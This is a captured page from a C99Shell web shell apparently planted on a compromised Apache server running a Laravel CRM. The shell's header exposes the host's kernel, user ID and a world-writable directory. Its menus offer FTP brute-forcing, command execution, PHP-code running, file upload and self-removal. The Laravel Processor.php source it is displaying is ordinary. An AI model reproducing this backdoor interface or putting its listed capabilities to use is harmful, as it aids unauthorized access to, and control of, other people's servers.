!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/laravel/framework/src/Illuminate/Database/Query/Processors/   drwxrwxrwx
Free 13.2 GB of 57.97 GB (22.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Processor.php (3.19 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Database\Query\Processors;

use 
Illuminate\Database\Query\Builder;

class 
Processor
{
    
/**
     * Process the results of a "select" query.
     *
     * @param  \Illuminate\Database\Query\Builder  $query
     * @param  array  $results
     * @return array
     */
    
public function processSelect(Builder $query$results)
    {
        return 
$results;
    }

    
/**
     * Process an  "insert get ID" query.
     *
     * @param  \Illuminate\Database\Query\Builder  $query
     * @param  string  $sql
     * @param  array  $values
     * @param  string|null  $sequence
     * @return int
     */
    
public function processInsertGetId(Builder $query$sql$values$sequence null)
    {
        
$query->getConnection()->insert($sql$values);

        
$id $query->getConnection()->getPdo()->lastInsertId($sequence);

        return 
is_numeric($id) ? (int) $id $id;
    }

    
/**
     * Process the results of a tables query.
     *
     * @param  array  $results
     * @return array
     */
    
public function processTables($results)
    {
        return 
array_map(function ($result) {
            
$result = (object) $result;

            return [
                
'name' => $result->name,
                
'schema' => $result->schema ?? null// PostgreSQL and SQL Server
                
'size' => isset($result->size) ? (int) $result->size null,
                
'comment' => $result->comment ?? null// MySQL and PostgreSQL
                
'collation' => $result->collation ?? null// MySQL only
                
'engine' => $result->engine ?? null// MySQL only
            
];
        }, 
$results);
    }

    
/**
     * Process the results of a views query.
     *
     * @param  array  $results
     * @return array
     */
    
public function processViews($results)
    {
        return 
array_map(function ($result) {
            
$result = (object) $result;

            return [
                
'name' => $result->name,
                
'schema' => $result->schema ?? null// PostgreSQL and SQL Server
                
'definition' => $result->definition,
            ];
        }, 
$results);
    }

    
/**
     * Process the results of a types query.
     *
     * @param  array  $results
     * @return array
     */
    
public function processTypes($results)
    {
        return 
$results;
    }

    
/**
     * Process the results of a columns query.
     *
     * @param  array  $results
     * @return array
     */
    
public function processColumns($results)
    {
        return 
$results;
    }

    
/**
     * Process the results of an indexes query.
     *
     * @param  array  $results
     * @return array
     */
    
public function processIndexes($results)
    {
        return 
$results;
    }

    
/**
     * Process the results of a foreign keys query.
     *
     * @param  array  $results
     * @return array
     */
    
public function processForeignKeys($results)
    {
        return 
$results;
    }

    
/**
     * Process the results of a column listing query.
     *
     * @deprecated Will be removed in a future Laravel version.
     *
     * @param  array  $results
     * @return array
     */
    
public function processColumnListing($results)
    {
        return 
$results;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0094 ]--